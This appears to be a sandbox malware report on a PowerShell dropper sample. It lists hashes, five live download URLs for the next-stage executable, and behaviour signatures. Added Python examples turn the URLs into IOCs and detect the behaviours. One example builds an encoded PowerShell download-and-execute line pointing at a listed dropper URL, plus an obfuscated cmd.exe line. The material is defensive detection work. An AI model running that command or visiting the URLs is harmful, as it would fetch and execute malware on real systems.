General

  • Target

    f6010602af25513e5e82d4640807d08d_JaffaCakes118

  • Size

    90KB

  • Sample

    241215-2ahp7szmet

  • MD5

    f6010602af25513e5e82d4640807d08d

  • SHA1

    cc045aa7f68e85e0877364db80399bdbf0ecdbf6

  • SHA256

    ae4f24905553e34675bfa73dc2048fbe0c05170945c1c7e0fbcf38bfd5005c6c

  • SHA512

    bb59090bac795cd8b7e6cfc4d520654046c9a0f41914a5c8e7df6948b785108d7b672a58e13aa25a5b7684b05ad15d760b270a44f903d7506d4abe88e2bb72e3

  • SSDEEP

    1536:qptJlmrJpmxlRw99NBr+a239xfP2G9HdpkX:2te2dw99fy9MqHsX

Malware Config

Extracted

  • Language

    ps1 (deobfuscated)

  • URLs (type: exe.dropper)

    http://circuloproviamiga.com/wp-content/themes/fO2OYUW09
    http://raidking.com/d0dtPLO2Ke
    http://kulikovonn.ru/DBDTu0GH
    http://lindgrenfinancial.com/u8PypS85i5
    http://imish.ru/ImIjO2F
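
The five URLs above are tagged exe.dropper, meaning they are download locations for the next-stage executable extracted from the sample's PowerShell. The block below is an added example, not part of the sandbox report: it turns those URLs into defanged indicators, splits them into host and full-URL IOCs, and checks proxy log lines for hits. The proxy log lines are constructed for illustration and are not from the report; the log format (timestamp, client, method, URL, status) is an assumption.

```python
"""Turn the dropper URLs extracted from the sample's PowerShell config into
usable IOCs and check them against proxy logs.

Added example, not part of the sandbox report. DROPPER_URLS are the five
exe.dropper URLs the report lists; PROXY_LOG is constructed sample data.
"""
from urllib.parse import urlsplit

# The five exe.dropper URLs exactly as extracted from the deobfuscated ps1 config.
DROPPER_URLS = [
    "http://circuloproviamiga.com/wp-content/themes/fO2OYUW09",
    "http://raidking.com/d0dtPLO2Ke",
    "http://kulikovonn.ru/DBDTu0GH",
    "http://lindgrenfinancial.com/u8PypS85i5",
    "http://imish.ru/ImIjO2F",
]


def defang(url: str) -> str:
    """Defang a URL so it cannot be clicked when pasted into a ticket or report."""
    return (url.replace("http://", "hxxp://")
               .replace("https://", "hxxps://")
               .replace(".", "[.]"))


def iocs(urls):
    """Split URLs into indicators: a sorted list of unique hosts and a set of (host, path)."""
    hosts = set()
    full = set()
    for u in urls:
        p = urlsplit(u)
        host = (p.hostname or "").lower()
        hosts.add(host)
        full.add((host, p.path))
    return sorted(hosts), full


# Constructed proxy log lines (not from the report), one request per line:
# <timestamp> <client ip> <method> <url> <status>
PROXY_LOG = """\
2024-12-15T20:02:11Z 10.0.4.23 GET http://circuloproviamiga.com/wp-content/themes/fO2OYUW09 200
2024-12-15T20:02:12Z 10.0.4.23 GET http://www.example.com/index.html 200
2024-12-15T20:02:19Z 10.0.4.57 GET http://kulikovonn.ru/DBDTu0GH 404
2024-12-15T20:03:40Z 10.0.4.57 GET http://raidking.com/ 200
"""


def match_proxy_log(log_text: str, urls=DROPPER_URLS):
    """Return (client, url, kind) for each log line hitting a dropper indicator.

    kind is 'url' for an exact host+path hit and 'host' for a host-only hit.
    A host-only hit is weaker evidence: the same site may also serve content
    unrelated to the dropper, so it deserves a look rather than an automatic verdict.
    """
    hosts, full = iocs(urls)
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue  # malformed or truncated line; skip rather than crash
        client, url = parts[1], parts[3]
        p = urlsplit(url)
        host = (p.hostname or "").lower()
        if (host, p.path) in full:
            hits.append((client, url, "url"))
        elif host in hosts:
            hits.append((client, url, "host"))
    return hits


if __name__ == "__main__":
    for u in DROPPER_URLS:
        print(defang(u))
    for hit in match_proxy_log(PROXY_LOG):
        print(hit)
```

The exact-URL match is the high-confidence signal, since the random-looking path segments are specific to this campaign's download locations; the host-only match is there to catch retrieval of the same file under a different path and to surface related activity from the same client.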

Targets

    • Target

      f6010602af25513e5e82d4640807d08d_JaffaCakes118 (90KB; MD5, SHA1, SHA256, SHA512 and SSDEEP as listed under General above)

    Score
    10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell (T1059.001)

      Uses the powershell.exe command.

    • Obfuscated cmd.exe command line

      An obfuscated cmd.exe command-line is typically used to evade detection.
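
The signatures above describe three behaviours a detection engineer would want to reproduce from process-creation telemetry: a document-handling parent spawning a script interpreter, PowerShell launched with an encoded command, and a cmd.exe command line that has been obfuscated. The block below is an added example, not part of the sandbox report, that evaluates simplified process-creation events against those behaviours. The events are constructed for illustration (Sysmon Event ID 1 style fields, reduced to parent image, image and command line); the Office parent and the PowerShell payload are assumptions and are not taken from the report, and "Encoded PowerShell contains URL" is a name introduced here.

```python
"""Reproduce the report's process-level signatures over constructed
process-creation events.

Added example, not part of the sandbox report. Events are constructed; the
Office parent, the encoded payload and the field names are assumptions.
"""
import base64
import re

# Parents that should not normally launch a shell or script interpreter.
DOCUMENT_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "acrord32.exe", "outlook.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or None."""
    m = re.search(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid base64/UTF-16LE; treat as not encoded


def cmd_obfuscation_score(cmdline: str) -> int:
    """Count cmd.exe obfuscation tricks present; 0 means nothing suspicious."""
    score = 0
    if cmdline.count("^") >= 3:                      # caret escapes inside tokens: p^o^w^e^r^s^h^e^l^l
        score += 1
    if re.search(r"%\w+:~\d+,\d+%", cmdline):        # substring extraction from env vars: %COMSPEC:~0,1%
        score += 1
    if re.search(r"set\s+\w+=.*&&?\s*call\s+%\w+", cmdline, re.I):  # build a variable, then call it
        score += 1
    if cmdline.count('"') >= 8:                      # excessive quoting used to break up strings
        score += 1
    return score


def evaluate(event: dict) -> list:
    """Return the list of signature names a single process-creation event triggers."""
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    image = event["image"].rsplit("\\", 1)[-1].lower()
    cmd = event["command_line"]
    hits = []
    if parent in DOCUMENT_PARENTS and image in INTERPRETERS:
        hits.append("Process spawned unexpected child process")
    if image in {"powershell.exe", "pwsh.exe"}:
        hits.append("Command and Scripting Interpreter: PowerShell")
        decoded = decode_encoded_command(cmd)
        if decoded and re.search(r"https?://", decoded, re.I):
            hits.append("Encoded PowerShell contains URL")
    if image == "cmd.exe" and cmd_obfuscation_score(cmd) >= 2:
        hits.append("Obfuscated cmd.exe command-line")
    return hits


# Constructed sample payload and events (assumptions, not from the report).
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://imish.ru/ImIjO2F')"
ENCODED = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode()

EVENTS = [
    {   # a document macro launches PowerShell with an encoded command
        "parent_image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe -NoP -W Hidden -Enc " + ENCODED,
    },
    {   # cmd.exe launched with caret and env-var substring obfuscation
        "parent_image": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
        "image": r"C:\Windows\System32\cmd.exe",
        "command_line": "cmd /c set x=p^o^w^e^r^s^h^e^l^l && call %x% -w 1 %COMSPEC:~0,1%",
    },
    {   # benign: Explorer starts a plain PowerShell console
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": "powershell.exe",
    },
]


def run(events=EVENTS):
    """Evaluate every event; returns one hit list per event, in order."""
    return [evaluate(e) for e in events]


if __name__ == "__main__":
    for event, hits in zip(EVENTS, run()):
        print(event["command_line"][:60], "->", hits)
```

The parent/child rule fires on its own and does not depend on decoding anything, which is why sandboxes rate it highly: the obfuscation tricks vary from campaign to campaign, but a word processor starting powershell.exe or cmd.exe does not.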

MITRE ATT&CK Enterprise v15